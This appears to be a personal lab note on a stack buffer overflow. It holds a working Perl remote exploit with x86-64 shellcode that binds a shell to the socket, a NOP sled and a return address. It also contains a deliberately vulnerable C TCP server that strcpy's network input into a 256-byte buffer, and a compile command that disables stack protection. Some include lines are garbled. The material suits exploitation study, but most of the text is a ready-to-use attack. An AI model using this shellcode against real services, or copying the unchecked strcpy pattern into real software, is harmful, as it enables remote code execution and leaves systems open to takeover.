2022-05-20 buffer overflow attack

z@z-ThinkPad-T400:~/zbuffer$ cat z.perl

#!/usr/bin/perl

use IO::Select;

use IO::Socket::INET;

$|=1;

print "Remote Exploit Example";

print "by 0x00pf for 0x00sec :)nn";

$addr = "\xa0\xdf\xff\xff\xff\x7f\x00\x00";

$off = 264;

# Generate the payload

$shellcode = "\x48\x31\xc0\x50\x50\x50\x5e\x5a\x50\x5f\xb0\x20\x0f\x05\x48\xff\xc8\x50\x5f\xb0\x21\x0f\x05\x48\xff\xc6\x48\x89\xf0\x3c\x02\x75\xf2\x52\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x52\x5e\xb0\x3b\x0f\x05";

$nops = $off - length $shellcode;

$payload = $shellcode . "\x90" x $nops  . $addr;

#$payload = "\x90" x $nops . $shellcode . $addr;

$plen = length $payload;

$slen = length $shellcode;

print "SLED $nops Shellcode: $slen Payload size: $plen";

# Connect

my $socket = new IO::Socket::INET (

    PeerHost => '127.0.0.1',

    PeerPort => '9000',

    Proto => 'tcp',

    );

# Set up select for asynchronous read from the server

$sel = IO::Select->new( $socket );

$sel->add(*STDIN);

$socket->send ($payload);

$socket->recv ($trash,1024);

$timeout = .1;

$flag = 1; # Just to show a prompt

# Interact!

while (1) {

    if (@ready = $sel->can_read ($timeout))  {

        foreach $fh (@ready) {

            $flag =1;

            if($fh == $socket) {

                  $socket->recv ($resp, 1024);

                  print $resp;

            }

            else { # It is stdin

                  $line = ;

                  $socket->send ($line);

            }

        }

    }

    else { # Show the prompt whenever everything's been read

        print "0x00pf]>  " if ($flag);

        $flag = 0;

    }

}

z@z-ThinkPad-T400:~/zbuffer$ cat z.c

#include

#include

#include

#include

int process_request (int s1, char *reply)

{

  char result[256];

  strcpy (result, reply);

  write (s1, result, strlen(result));

  printf ("Result: %s\n", &result);

  return 0;

}

int main (int argc, char *argv[])

{

  struct sockaddr_in  server, client;

  socklen_t            len = sizeof (struct sockaddr_in);

  int                  s,s1, ops = 1;

  char                reply[1024];

  server.sin_addr.s_addr = INADDR_ANY;

  server.sin_family = AF_INET;

  server.sin_port = htons(9000);

  s = socket (PF_INET, SOCK_STREAM, 0);

  if ((setsockopt (s, SOL_SOCKET, SO_REUSEADDR, &ops, sizeof(ops))) < 0)

    perror ("pb_server (reuseaddr):");

  bind (s, (struct sockaddr *) &server, sizeof (server));

  listen (s, 10);

  while (1)

    {

      s1 = accept (s, (struct sockaddr *)&client, &len);

      //puts("hi");

      //printf ("Connection from %s\n", inet_ntoa (client.sin_addr));

      memset (reply, 0, 1024);

      read (s1, reply, 1024);

      process_request (s1, reply);

      close (s1);

    }

  return 0;

}

z@z-ThinkPad-T400:~/zbuffer$ cat z.cmd

gcc -g -fno-stack-protector -z execstack z.c